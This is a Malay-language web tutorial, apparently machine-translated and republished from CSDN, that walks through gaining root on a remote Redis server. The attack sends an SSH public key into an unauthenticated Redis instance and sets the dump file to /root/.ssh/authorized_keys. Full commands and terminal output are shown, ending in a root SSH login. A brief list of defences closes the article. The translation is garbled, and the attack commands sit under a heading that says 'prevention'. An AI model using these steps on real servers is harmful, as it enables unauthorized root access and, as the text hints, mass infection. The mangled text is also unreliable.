Rumah > pangkalan data > Redis > Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci)

Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci)

WBOY
Lepaskan: 2022-02-23 17:58:08
ke hadapan
3254 orang telah melayarinya

Artikel ini membawakan anda pengetahuan yang berkaitan tentang prinsip perlombongan Redis Di sini kami akan menunjukkan cara menggunakan Redis untuk meningkatkan keistimewaan untuk mendapatkan pengguna root pelayan jauh, dan cara melindunginya harap ia akan membantu Semua orang membantu.

Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci)

Pembelajaran yang disyorkan: Tutorial video Redis

Hari ini kami akan menunjukkan cara untuk meningkatkan keistimewaan melalui Redis untuk mendapatkan pengguna Root bagi pelayan jauh.

1. Mula-mula kita memerlukan beberapa prasyarat

  • Syarat 1: Anda mesti mempunyai Redis dahulu, dan kami perlu mengetahui portnya【 Lalai 6379];

  • Syarat 2: Kata laluan untuk Redis tidak boleh terlalu rumit, atau tiada kata laluan; yang memulakan Redis adalah yang paling Untungnya, ia adalah pengguna Root, yang lebih merosakkan; >

  • 2.1 Cipta sepasang kunci rahsia
Hasilkan pasangan melalui ssh-keygen Sudah tentu, anda boleh menggunakan yang anda sudah ada tanpa sebarang masalah.

Seterusnya, nilai kunci serangan dijana melalui kunci awam

  • Kandungan adalah seperti berikut

    Tujuan menambah dua baris baharu sebelum dan selepas di sini adalah untuk menghalang sambungan data Bersama-sama mereka menyebabkan masalah kegagalan.

2.2 Konfigurasikan Kunci kepada Redis
root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Salin selepas log masuk

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
Salin selepas log masuk

Operasi adalah seperti berikut:

root@kali:/tmp/rediskey# cat foo.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
Salin selepas log masuk

Log masuk ke Redis Semak sama ada ia telah ditulis kepada Redis.

  • 2.3 Gantikan fail sistem melalui mekanisme penjimatan Redis

Lihat operasi berikut
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK
Salin selepas log masuk

Pada masa ini, kami log masuk ke hos jauh untuk melihat kesannya.
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
Salin selepas log masuk
  • OK, kami telah berjaya meningkatkan keistimewaan di sini, jadi mari kita lihat apakah fail yang dieksport? Sebenarnya, ia hanyalah bentuk fail Redis yang disimpan Jika anda berminat, anda boleh membukanya sendiri dan melihatnya tidak akan ditunjukkan di sini.

    3. Bagaimana untuk mencegah

Kerentanan ini cukup kuat sekarang, tambahkannya pada tugas yang dijadualkan untuk melaksanakan beberapa skrip dan kemudian Apa mengenai jangkitan kumpulan?

Teknik pencegahan adalah seperti berikut:
192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit
Salin selepas log masuk

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~#
Salin selepas log masuk
Redis tidak seharusnya dipantau pada IP berbahaya Jika ya, sila tambah kawalan tembok api

Sekatan Kata Laluan Redis mesti ditingkatkan dan tidak boleh menjadi kata laluan yang lemah;

Cuba untuk tidak memulakan Redis sebagai pengguna Root.

  • Ikuti tiga perkara di atas untuk mengelakkan perlombongan Redis, dan tidak akan ada masalah

    Pembelajaran yang disyorkan:
  • Tutorial video Redis

Atas ialah kandungan terperinci Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci). Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan:
sumber:csdn.net
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan